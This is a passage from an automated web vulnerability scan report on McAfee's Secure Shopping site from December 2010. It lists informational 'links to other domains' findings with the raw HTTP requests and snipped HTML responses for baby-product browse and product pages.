mUGcavy2yG4mauKoRMCbxmfHbwzTZaa%252FH9ZKRAvDC00W1EhpRhuGonx2wd2Gf1nmVz3LbM9IjuRDOBVvwe2d0LoyXhAfbk%252Fw%252BY0CJdHk7YccqW1FknRweL0x52TwNYdKds5XdN3b78ARS28BVIAQAA&cv=56"onclick="return trackclick(6);"><img width=100 height=100 src="http://image.become.com/imageserver/s9/956172899-100-100-5-0/" border=0 alt="Ergo Baby Infant Insert Heart 2 Heart - Natural --"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
iYEvrN%252BOzim2O09hIEyUiB%252BFHkoNeIDCnDaNWOrtm6YGW1xbI5bVtm%252BkR345lAK34P7O5H8ZLwEHvy%252F4dMaLEuD0fsOGVL6q6Tq4PNaQ%252B7pwFsulO28rumbl%252F%252BAMgMa3pIAQAA&cv=56"onclick="return trackclick(7);"><img width=100 height=100 src="http://image.become.com/imageserver/s4/956172904-100-100-5-0/" border=0 alt="Ergo Baby Organic Infant Insert Heart 2 Heart - Silver --"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
lsgVE58Krh2cFX26it2fejQQfiMWajW4kEdYpsUU%252BOWTuwJ8qeRrfo%252FzE9ojnhRKAWP0d691g4RzzAlvz%252FARVqqEndCRuu0zl2ltHRwOJ6C7unDix9JyvSm7pVNn%252Bn4iymSAEAAA%253D%253D&cv=56"onclick="return trackclick(8);"><img width=100 height=100 src="http://image.become.com/imageserver/s9/956171849-100-100-5-0/" border=0 alt="Baby Bjorn Baby Carrier Active Organic - Walnut/Khaki --"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
ne11kP0ru%252ByRBQyXfr4dUmH5bWmKvnxQMG5AaBRZw65QRTEmzK2dYbGwxeGZTfkueju0i1wxlBk95OdHGDcI2ZTzr0%252FH2aKqEq9mfSMkzXxN4mWwWT4Q4OLz2Y%252BCDtxU9F3r%252F9A8eLKDhIAQAA&cv=56"onclick="return trackclick(9);"><img width=100 height=100 src="http://image.become.com/imageserver/s9/956174269-100-100-5-0/" border=0 alt="Ergo Baby Weather Cover - Winter --"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...
</a>
 - 
<a target=_top href="http://www.mcafeesecure.com/us/terms.jsp">Terms of Service</a>
...[SNIP]...

2.3. http://secureshopping.mcafee.com/browse/baby/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/

Issue detail

The page was loaded from a URL containing a query string:

http://secureshopping.mcafee.com/browse/baby/?brand=cafepress

The response contains the following links to other domains:

http://image.become.com/imageserver/s1/956121231-100-100-5-0/
http://image.become.com/imageserver/s2/928007902-100-100-5-0/
http://image.become.com/imageserver/s2/942936322-100-100-5-0/
http://image.become.com/imageserver/s4/957301264-100-100-5-0/
http://image.become.com/imageserver/s5/935025125-100-100-5-0/
http://image.become.com/imageserver/s5/935033815-100-100-5-0/
http://image.become.com/imageserver/s6/927907796-100-100-5-0/
http://image.become.com/imageserver/s6/927920406-100-100-5-0/
http://image.become.com/imageserver/s8/927883928-100-100-5-0/
http://image.become.com/imageserver/s8/927905878-100-100-5-0/
http://images.scanalert.com/meter/secureshopping.mcafee.com/55.gif
http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js
http://www.addthis.com/bookmark.php?v=20
http://www.mcafeesecure.com/us/terms.jsp
https://www.mcafeesecure.com/RatingVerify?ref=secureshopping.mcafee.com

Request

GET /browse/baby/?brand=cafepress HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:12 GMT
Content-Length: 68830

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Baby at McAfee Secure Shopping - Search, Discover & Compare
...[SNIP]...
</script>
<a style="font-weight:bold;text-decoration:none;font-size:11px;" href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()">Bookmark This Page</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...

<a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=secureshopping.mcafee.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/secureshopping.mcafee.com/55.gif" alt="McAfee SECURE sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
aSvAcoMAYCDArog%26brand%3DCafePress%26u%3DH4sIAAAAAAAAAMsoKSmw0tcvKUpMzs7MS9crTk0sSs7ITSzKTi0B8ZPzc%252FWTczKTs%252FUSiwvsEzNTbM0sLQxMjM2NLAEcs5azOwAAAA%253D%253D&cv=30"onclick="return trackclick(0);"><img width=100 height=100 src="http://image.become.com/imageserver/s2/942936322-100-100-5-0/" border=0 alt="BABY with arrow Baby Women's Tank Top by CafePress"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
Qt2t7Nw4NWKLzdw%26brand%3DCafePress%26u%3DH4sIAAAAAAAAAMsoKSmw0tcvKUpMzs7MS9crTk0sSs7ITSzKTi0B8ZPzc%252FWTczKTs%252FUSiwvsEzNTbE1NLCzMjQwtLQGpoCjlOwAAAA%253D%253D&cv=30"onclick="return trackclick(1);"><img width=100 height=100 src="http://image.become.com/imageserver/s1/956121231-100-100-5-0/" border=0 alt="Baby with Arrow Baby Maternity T-Shirt by CafePress"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
ZdIpepVm3tJYl1g%26brand%3DCafePress%26u%3DH4sIAAAAAAAAAMsoKSmw0tcvKUpMzs7MS9crTk0sSs7ITSzKTi0B8ZPzc%252FWTczKTs%252FUSiwvsEzNTbM1NjE1NLSyMTQEh47KcOwAAAA%253D%253D&cv=30"onclick="return trackclick(2);"><img width=100 height=100 src="http://image.become.com/imageserver/s4/957301264-100-100-5-0/" border=0 alt="Baby - with text black Women's V-Neck Dark T-Shi Supernatural Women's V-Neck Dark T-Shirt by CafePress"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
EtNMbIrsnf3HcKA%26brand%3DCafePress%26u%3DH4sIAAAAAAAAAMsoKSmw0tcvKUpMzs7MS9crTk0sSs7ITSzKTi0B8ZPzc%252FWTczKTs%252FUSiwvsEzNTbE0sTUwMLc1NDQCP8pFQOwAAAA%253D%253D&cv=30"onclick="return trackclick(3);"><img width=100 height=100 src="http://image.become.com/imageserver/s8/927883928-100-100-5-0/" border=0 alt="Baby with arrow Cute Women's Dark T-Shirt by CafePress"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
TEAmngQ4O5fB9mA%26brand%3DCafePress%26u%3DH4sIAAAAAAAAAMsoKSmw0tcvKUpMzs7MS9crTk0sSs7ITSzKTi0B8ZPzc%252FWTczKTs%252FUSiwvsEzNTbE3MTU3MLAwtjACvM922OwAAAA%253D%253D&cv=30"onclick="return trackclick(4);"><img width=100 height=100 src="http://image.become.com/imageserver/s8/927905878-100-100-5-0/" border=0 alt="What Twins Say Baby Maternity T-Shirt by CafePress"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
oPCHXKw%26brand%3DCafePress%26u%3DH4sIAAAAAAAAAMsoKSmw0tcvKUpMzs7MS9crTk0sSs7ITSzKTi0B8ZPzc%252FWTczKTs%252FUSiwvsEzNTbE0sLMyMLEzMDQAA%252BD%252FZOwAAAA%253D%253D&cv=30"onclick="return trackclick(5);"><img width=100 height=100 src="http://image.become.com/imageserver/s2/928007902-100-100-5-0/" border=0 alt="Future Hoosier Baby Maternity T-Shirt by CafePress"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
UFVoL1uVyU7BbtQ%26brand%3DCafePress%26u%3DH4sIAAAAAAAAAMsoKSmw0tcvKUpMzs7MS9crTk0sSs7ITSzKTi0B8ZPzc%252FWTczKTs%252FUSiwvsEzNTbE3MDEyMzEyMTQBwc0wxOwAAAA%253D%253D&cv=30"onclick="return trackclick(6);"><img width=100 height=100 src="http://image.become.com/imageserver/s5/935025125-100-100-5-0/" border=0 alt="Baby is for life - Valentines Maternity Maternity T-Shirt by CafePress"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
Ex2MCvRZbE5PZVA%26brand%3DCafePress%26u%3DH4sIAAAAAAAAAMsoKSmw0tcvKUpMzs7MS9crTk0sSs7ITSzKTi0B8ZPzc%252FWTczKTs%252FUSiwvsEzNTbE3MLc0MjMyNTQHO3VWlOwAAAA%253D%253D&cv=30"onclick="return trackclick(7);"><img width=100 height=100 src="http://image.become.com/imageserver/s6/927907796-100-100-5-0/" border=0 alt="Womb Baby Baby Maternity T-Shirt by CafePress"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
NcYfWX7fiUc4KZw%26brand%3DCafePress%26u%3DH4sIAAAAAAAAAMsoKSmw0tcvKUpMzs7MS9crTk0sSs7ITSzKTi0B8ZPzc%252FWTczKTs%252FUSiwvsEzNTbE1NDS1NTEyMjQEy0HwJOwAAAA%253D%253D&cv=30"onclick="return trackclick(8);"><img width=100 height=100 src="http://image.become.com/imageserver/s6/927920406-100-100-5-0/" border=0 alt="SONOGRAM Baby Maternity Dark T-Shirt by CafePress"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
9zZvyhIb-grgE8g%26brand%3DCafePress%26u%3DH4sIAAAAAAAAAMsoKSmw0tcvKUpMzs7MS9crTk0sSs7ITSzKTi0B8ZPzc%252FWTczKTs%252FUSiwvsEzNTbE2MzQ0MTEyNzQHqoZhvOwAAAA%253D%253D&cv=30"onclick="return trackclick(9);"><img width=100 height=100 src="http://image.become.com/imageserver/s5/935033815-100-100-5-0/" border=0 alt="BABIES 2 arrows for twins Twins Maternity T-Shirt by CafePress"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...
</a>
 - 
<a target=_top href="http://www.mcafeesecure.com/us/terms.jsp">Terms of Service</a>
...[SNIP]...

2.4. http://secureshopping.mcafee.com/browse/baby/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/

Issue detail

The page was loaded from a URL containing a query string:

http://secureshopping.mcafee.com/browse/baby/?sb=pricelh

The response contains the following links to other domains:

http://image.become.com/imageserver/s0/877457040-100-100-5-0/
http://image.become.com/imageserver/s2/339693632-100-100-5-0/
http://image.become.com/imageserver/s2/676427172-100-100-5-0/
http://image.become.com/imageserver/s2/877457612-100-100-5-0/
http://image.become.com/imageserver/s3/339693623-100-100-5-0/
http://image.become.com/imageserver/s3/674728823-100-100-5-0/
http://image.become.com/imageserver/s4/676427204-100-100-5-0/
http://image.become.com/imageserver/s6/749021936-100-100-5-0/
http://image.become.com/imageserver/s8/560816398-100-100-5-0/
http://image.become.com/imageserver/s8/639358718-100-100-5-0/
http://images.scanalert.com/meter/secureshopping.mcafee.com/55.gif
http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js
http://www.addthis.com/bookmark.php?v=20
http://www.mcafeesecure.com/us/terms.jsp
https://www.mcafeesecure.com/RatingVerify?ref=secureshopping.mcafee.com

Request

GET /browse/baby/?sb=pricelh HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:14 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:14 GMT
Content-Length: 74516

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Baby at McAfee Secure Shopping - Search, Discover & Compare
...[SNIP]...
</script>
<a style="font-weight:bold;text-decoration:none;font-size:11px;" href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()">Bookmark This Page</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...

<a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=secureshopping.mcafee.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/secureshopping.mcafee.com/55.gif" alt="McAfee SECURE sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
9UQzycJ3A5HeJBQ%26brand%3DSullivans%26u%3DH4sIAAAAAAAAAMsoKSmw0tcvKUpMzs7MS9crTk0sSs7ITSzKTi0B8ZPzc%252FWTczKTs%252FUSiwvsEzNTbI1NLUxMTC2NLQGd4tEDOwAAAA%253D%253D&cv=25"onclick="return trackclick(0);"><img width=100 height=100 src="http://image.become.com/imageserver/s3/674728823-100-100-5-0/" border=0 alt="Sullivans Embroidery Floss 8.7yd Light Baby Blue"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
mtaIFa7iQ6WS94LqG3hPSY67qmk%252FDcRB08X4yRPlorv9thtO%252FOTJGH%252F9RCYEKmzNtPQnt72LQlVUHKhJTgt4XilmN0Q4MsBvXwJjoO6DVDdyAFk4gK0QqjFPp1YM6UZeKp0RgBv9jqB3nDZlECAQAA&cv=35"onclick="return trackclick(1);"><img width=100 height=100 src="http://image.become.com/imageserver/s2/676427172-100-100-5-0/" border=0 alt="Colorations White Chalk - Set of 12"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
KsrBY8l9B7QjrMbdvSUTiuw%252BodX7SWLhgjv%252FEw2g%252Brx8D9f2rAMyFT5swnoZ05bNqQsiBlQs7g4kJxyzHavkYWvHo6HSwH9Oq%252BPZCCUQSFaINBivV1YM6UYWJe0RgAv4j1A%252BOvyKsCAQAA&cv=35"onclick="return trackclick(2);"><img width=100 height=100 src="http://image.become.com/imageserver/s4/676427204-100-100-5-0/" border=0 alt="Colorations Colored Chalk - Set of 12"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
ncllajHQtUV%252BY6w2tcMdpytivUiy%252FM1HIKjRuaL5RI6dya5StMsK1awwTIG8t1gbQVdX0p%252Fg2O%252Fav5ED%252FDu0Z0YGIwBbZBU2aCIbcCOAlXX01Y6Xa3hrmFZAQ1GqvwGaJ7Dv6gCAAA%253D&cv=9"onclick="return trackclick(3);"><img width=100 height=100 src="http://image.become.com/imageserver/s8/639358718-100-100-5-0/" border=0 alt="Sandylion Ivory Disney My Friends Tigger and Pooh mini wall stickers"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
D0m1At577vQl16Wpbbr3dzGHFlzG5Yi57bbcT9SoFJt%252FJYO4ZIS9h8EvrcmNIIVW1pEmV7nGH2%252BvDZk%252Bs6pKc6YRi3idX3j8uTTEgP6gSlUOf%252FtSUYreWaDstT4kePmLn%252BAAMkxshBAQAA&cv=32"onclick="return trackclick(4);"><img width=100 height=100 src="http://image.become.com/imageserver/s2/877457612-100-100-5-0/" border=0 alt="Sugar Babies 1.7 oz - 1 pack"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
tPAy7L7dfbOUywEiY3pCVP7TbBfsZApF1prJ9CwiVsPjN5bGXTsfqw5chU%252FzxD7Pnhc0DrHOBLjRCmLZL6%252BXV6kRnwQTVCsfr4v1YJ3VR8zU%252FLMdOjz5ip%252FgCpJh%252BsQQEAAA%253D%253D&cv=32"onclick="return trackclick(5);"><img width=100 height=100 src="http://image.become.com/imageserver/s0/877457040-100-100-5-0/" border=0 alt="Baby Ruth 1 bar"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
4EMsxxgl5sluv1apeYHq1P0YJ8wjADi7EhKDGRtMFOyBBJahO5vtcQTYDEaNtDX0avPIUGPujdLXhXgTrrvMgvSl%252BLo9L7ad16x%252BD4nwuGgsHK%252FX5sBwk5Ks48yn0BdPY2%252B%252FgAAAA%253D&cv=50"onclick="return trackclick(6);"><img width=100 height=100 src="http://image.become.com/imageserver/s3/339693623-100-100-5-0/" border=0 alt="Earth Therapeutics - Hydro Complexion Sponge - CLEARANCE PRICED"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
lAAqXY1GyZ4z2Zrx7g%26brand%3DCindus%26u%3DH4sIAAAAAAAAAMsoKSmw0tcvKUpMzs7MS9crTk0sSs7ITSzKTi0B8ZPzc%252FWTczKTs%252FUSiwvsEzNTbE3MDExMLSzMDAH9IbRnOwAAAA%253D%253D&cv=25"onclick="return trackclick(7);"><img width=100 height=100 src="http://image.become.com/imageserver/s6/749021936-100-100-5-0/" border=0 alt="Cindus Bows Carnival 4.5" Baby Blue"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
fsUo9ZLA3enapQ%26brand%3DCoatsClark%26u%3DH4sIAAAAAAAAAMsoKSmw0tcvKUpMzs7MS9crTk0sSs7ITSzKTi0B8ZPzc%252FWTczKTs%252FUSiwvsEzNTbI0NjA0NLIwNLAAusaxPOwAAAA%253D%253D&cv=25"onclick="return trackclick(8);"><img width=100 height=100 src="http://image.become.com/imageserver/s8/560816398-100-100-5-0/" border=0 alt="C&C Dual Duty XP Thread All Purpose 125yd Baby Pastels"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
<a rel=nofollow href="/green-hydro-complexion-sponge--pid-209299303?&cid=356&cv=51"><img width=100 height=100 src="http://image.become.com/imageserver/s2/339693632-100-100-5-0/" border=0 alt="Green Hydro Complexion Sponge"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...
</a>
 - 
<a target=_top href="http://www.mcafeesecure.com/us/terms.jsp">Terms of Service</a>
...[SNIP]...

2.5. http://secureshopping.mcafee.com/safeseat-step-1-baby-classics-car-seat-in-rittenhouse-1756125--pid-214267116 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/safeseat-step-1-baby-classics-car-seat-in-rittenhouse-1756125--pid-214267116

Issue detail

The page was loaded from a URL containing a query string:

http://secureshopping.mcafee.com/safeseat-step-1-baby-classics-car-seat-in-rittenhouse-1756125--pid-214267116?&cid=29&cv=55

The response contains the following links to other domains:

http://image.become.com/imageserver/s0/569828030-88-31-5-0/
http://image.become.com/imageserver/s1/717012811-88-31-5-0/
http://image.become.com/imageserver/s8/681826418-175-150-5-0/
http://images.scanalert.com/meter/secureshopping.mcafee.com/55.gif
http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js
http://www.addthis.com/bookmark.php?v=20
http://www.mcafeesecure.com/us/terms.jsp
https://www.mcafeesecure.com/RatingVerify?ref=secureshopping.mcafee.com

Request

GET /safeseat-step-1-baby-classics-car-seat-in-rittenhouse-1756125--pid-214267116?&cid=29&cv=55 HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:19 GMT
Set-Cookie: user=id=1293248423528-1-dMZf&ph=214267116; path=/; expires=Sun, 25-Dec-2011 03:53:19 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:53:19 GMT
Content-Length: 18204

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>McAfee Secure Shopping - Securely Find Prices on SafeSeat Step 1 Baby
...[SNIP]...
</script>
<a style="font-weight:bold;text-decoration:none;font-size:11px;" href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()">Bookmark This Page</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...

<a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=secureshopping.mcafee.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/secureshopping.mcafee.com/55.gif" alt="McAfee SECURE sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<td width="175" valign="top">
<img src="http://image.become.com/imageserver/s8/681826418-175-150-5-0/" alt="SafeSeat Step 1 Baby Classics Car Seat in Rittenhouse - 1756125">
</td>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
